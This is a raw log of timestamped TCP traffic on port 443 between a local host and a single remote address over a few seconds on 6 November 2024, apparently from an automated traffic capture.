Nov 6, 2024 17:03:41.331757069 CET	50216	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.331809998 CET	443	50216	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.331912041 CET	50216	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.332075119 CET	50216	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.332089901 CET	443	50216	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.373788118 CET	443	50214	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.374283075 CET	50214	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.374316931 CET	443	50214	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.374716043 CET	50214	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.374721050 CET	443	50214	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.441714048 CET	443	50213	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.441747904 CET	443	50213	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.441802025 CET	443	50213	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.441909075 CET	50213	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.442156076 CET	50213	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.442183971 CET	443	50213	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.442194939 CET	50213	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.442200899 CET	443	50213	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.445152998 CET	50217	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.445219994 CET	443	50217	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.445302963 CET	50217	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.445424080 CET	50217	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.445444107 CET	443	50217	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.504673958 CET	443	50214	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.504756927 CET	443	50214	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.504875898 CET	50214	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.505040884 CET	50214	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.505075932 CET	443	50214	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.505093098 CET	50214	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.505099058 CET	443	50214	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.508302927 CET	50218	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.508353949 CET	443	50218	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.508426905 CET	50218	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.508557081 CET	50218	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.508572102 CET	443	50218	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.657596111 CET	443	50215	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.658174038 CET	50215	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.658190012 CET	443	50215	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.658641100 CET	50215	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.658646107 CET	443	50215	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.792157888 CET	443	50215	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.792196989 CET	443	50215	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.792241096 CET	443	50215	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.792290926 CET	50215	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.792323112 CET	50215	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.792546034 CET	50215	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.792561054 CET	443	50215	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.792572975 CET	50215	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.792577982 CET	443	50215	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.795175076 CET	50219	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.795219898 CET	443	50219	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.795288086 CET	50219	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.795437098 CET	50219	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.795452118 CET	443	50219	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.061666965 CET	443	50216	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.062239885 CET	50216	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.062269926 CET	443	50216	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.062829018 CET	50216	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.062835932 CET	443	50216	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.173986912 CET	443	50217	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.174556017 CET	50217	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.174586058 CET	443	50217	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.174999952 CET	50217	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.175008059 CET	443	50217	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.190790892 CET	443	50216	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.190896034 CET	443	50216	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.190977097 CET	50216	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.191220999 CET	50216	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.191240072 CET	443	50216	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.191251993 CET	50216	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.191257954 CET	443	50216	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.195441961 CET	50220	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.195471048 CET	443	50220	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.195559978 CET	50220	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.195709944 CET	50220	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.195725918 CET	443	50220	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.240883112 CET	443	50218	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.273288965 CET	50218	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.273317099 CET	443	50218	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.273746967 CET	50218	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.273751974 CET	443	50218	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.303414106 CET	443	50217	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.303497076 CET	443	50217	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.303576946 CET	50217	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.303931952 CET	50217	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.303953886 CET	443	50217	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.303966045 CET	50217	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.303972006 CET	443	50217	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.306519985 CET	50221	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.306566000 CET	443	50221	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.306641102 CET	50221	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.306791067 CET	50221	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.306807041 CET	443	50221	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.398076057 CET	443	50218	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.398379087 CET	443	50218	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.398443937 CET	50218	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.399621964 CET	50218	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.399652958 CET	443	50218	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.399693012 CET	50218	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.399703026 CET	443	50218	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.407167912 CET	50222	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.407205105 CET	443	50222	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.407268047 CET	50222	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.407495975 CET	50222	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.407506943 CET	443	50222	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.540333986 CET	443	50219	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.540838957 CET	50219	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.540873051 CET	443	50219	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.541317940 CET	50219	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.541323900 CET	443	50219	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.552824020 CET	50160	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.554876089 CET	50223	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.554912090 CET	443	50223	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.554981947 CET	50223	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.555108070 CET	50223	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.555120945 CET	443	50223	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.672655106 CET	443	50219	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.672780991 CET	443	50219	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.672831059 CET	443	50219	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.672849894 CET	50219	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.672887087 CET	50219	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.672976017 CET	50219	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.672992945 CET	443	50219	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.673008919 CET	50219	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.673013926 CET	443	50219	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.675594091 CET	50224	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.675616980 CET	443	50224	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.675707102 CET	50224	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.675862074 CET	50224	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.675873041 CET	443	50224	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.916517019 CET	443	50220	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.917130947 CET	50220	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.917180061 CET	443	50220	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:42.917778015 CET	50220	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:42.917783976 CET	443	50220	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.042124987 CET	443	50221	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.042645931 CET	50221	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.042659998 CET	443	50221	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.043087959 CET	50221	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.043092012 CET	443	50221	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.046267033 CET	443	50220	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.046339989 CET	443	50220	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.046399117 CET	50220	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.046561956 CET	50220	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.046578884 CET	443	50220	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.046591043 CET	50220	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.046596050 CET	443	50220	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.049381018 CET	50225	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.049426079 CET	443	50225	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.049515963 CET	50225	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.049738884 CET	50225	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.049755096 CET	443	50225	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.174712896 CET	443	50222	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.175381899 CET	50222	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.175398111 CET	443	50222	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.175837040 CET	50222	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.175842047 CET	443	50222	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.180438995 CET	443	50221	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.181396961 CET	443	50221	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.181454897 CET	50221	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.181468010 CET	443	50221	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.181480885 CET	443	50221	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.181536913 CET	50221	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.181591034 CET	50221	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.181610107 CET	443	50221	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.181624889 CET	50221	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.181631088 CET	443	50221	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.184756041 CET	50226	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.184788942 CET	443	50226	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.184870005 CET	50226	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.185055971 CET	50226	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.185069084 CET	443	50226	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.282046080 CET	443	50223	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.282936096 CET	50223	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.282957077 CET	443	50223	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.283544064 CET	50223	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.283550024 CET	443	50223	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.322099924 CET	443	50222	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.322155952 CET	443	50222	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.322252989 CET	50222	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.322515011 CET	50222	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.322527885 CET	443	50222	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.322540045 CET	50222	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.322544098 CET	443	50222	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.325839996 CET	50227	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.325872898 CET	443	50227	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.325973034 CET	50227	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.326224089 CET	50227	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.326239109 CET	443	50227	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.415139914 CET	443	50223	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.415172100 CET	443	50223	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.415216923 CET	443	50223	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.415263891 CET	50223	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.415323019 CET	50223	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.415584087 CET	50223	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.415596008 CET	443	50223	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.415606976 CET	50223	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.415612936 CET	443	50223	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.418833017 CET	50228	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.418857098 CET	443	50228	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.418953896 CET	50228	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.419166088 CET	50228	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.419176102 CET	443	50228	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.423742056 CET	443	50224	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.424185991 CET	50224	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.424210072 CET	443	50224	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.424616098 CET	50224	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.424621105 CET	443	50224	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.556332111 CET	443	50224	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.557583094 CET	443	50224	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.557656050 CET	50224	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.561172962 CET	50224	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.561212063 CET	50224	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.561211109 CET	443	50224	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.561219931 CET	443	50224	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.564740896 CET	50229	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.564775944 CET	443	50229	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.564851999 CET	50229	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.565187931 CET	50229	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.565200090 CET	443	50229	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.802860975 CET	443	50225	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.803419113 CET	50225	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.803446054 CET	443	50225	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.804049015 CET	50225	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.804054976 CET	443	50225	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.913881063 CET	443	50226	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.914468050 CET	50226	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.914494991 CET	443	50226	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.914916039 CET	50226	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.914921045 CET	443	50226	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.937196016 CET	443	50225	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.937268972 CET	443	50225	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.937403917 CET	50225	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.937769890 CET	50225	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.937793016 CET	443	50225	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.937805891 CET	50225	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.937812090 CET	443	50225	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.940675020 CET	50230	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.940710068 CET	443	50230	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:43.940818071 CET	50230	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.941046000 CET	50230	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:43.941055059 CET	443	50230	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.048218012 CET	443	50226	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.048772097 CET	443	50226	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.048845053 CET	50226	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.048886061 CET	50226	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.048903942 CET	443	50226	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.048913956 CET	50226	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.048918962 CET	443	50226	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.051604986 CET	50231	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.051649094 CET	443	50231	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.051722050 CET	50231	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.051861048 CET	50231	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.051872015 CET	443	50231	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.064543962 CET	443	50227	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.064970016 CET	50227	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.064989090 CET	443	50227	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.065397024 CET	50227	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.065402031 CET	443	50227	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.155884027 CET	443	50228	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.156291962 CET	50228	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.156306982 CET	443	50228	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.156703949 CET	50228	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.156709909 CET	443	50228	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.197208881 CET	443	50227	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.197242975 CET	443	50227	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.197284937 CET	443	50227	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.197304010 CET	50227	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.197329998 CET	50227	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.197556973 CET	50227	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.197571993 CET	443	50227	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.197581053 CET	50227	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.197586060 CET	443	50227	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.200388908 CET	50232	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.200433969 CET	443	50232	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.200520039 CET	50232	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.200695992 CET	50232	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.200712919 CET	443	50232	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.288646936 CET	443	50228	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.288737059 CET	443	50228	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.288800001 CET	50228	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.288965940 CET	50228	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.288981915 CET	443	50228	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.288991928 CET	50228	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.288996935 CET	443	50228	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.291680098 CET	50233	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.291723013 CET	443	50233	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.291817904 CET	50233	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.291974068 CET	50233	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.291985989 CET	443	50233	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.296304941 CET	443	50229	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.296689987 CET	50229	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.296711922 CET	443	50229	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.297137976 CET	50229	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.297143936 CET	443	50229	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.427364111 CET	443	50229	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.427834034 CET	443	50229	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.427911997 CET	50229	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.427968025 CET	50229	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.427984953 CET	443	50229	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.428002119 CET	50229	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.428005934 CET	443	50229	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.430653095 CET	50234	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.430699110 CET	443	50234	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.430775881 CET	50234	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.430907965 CET	50234	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.430917978 CET	443	50234	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.686019897 CET	443	50230	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.686547995 CET	50230	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.686558008 CET	443	50230	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.687005043 CET	50230	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.687009096 CET	443	50230	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.771219015 CET	443	50231	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.771806955 CET	50231	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.771828890 CET	443	50231	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.772283077 CET	50231	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.772289038 CET	443	50231	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.817745924 CET	443	50230	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.817819118 CET	443	50230	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.817878962 CET	50230	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.818053961 CET	50230	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.818067074 CET	443	50230	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.818078041 CET	50230	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.818083048 CET	443	50230	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.820883036 CET	50235	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.820925951 CET	443	50235	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.821002007 CET	50235	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.821258068 CET	50235	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.821270943 CET	443	50235	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.900547028 CET	443	50231	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.900629997 CET	443	50231	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.900676966 CET	50231	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.900881052 CET	50231	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.900892019 CET	443	50231	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.900903940 CET	50231	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.900908947 CET	443	50231	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.904020071 CET	50236	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.904069901 CET	443	50236	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.904166937 CET	50236	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.904366970 CET	50236	443	192.168.2.6	13.107.246.45
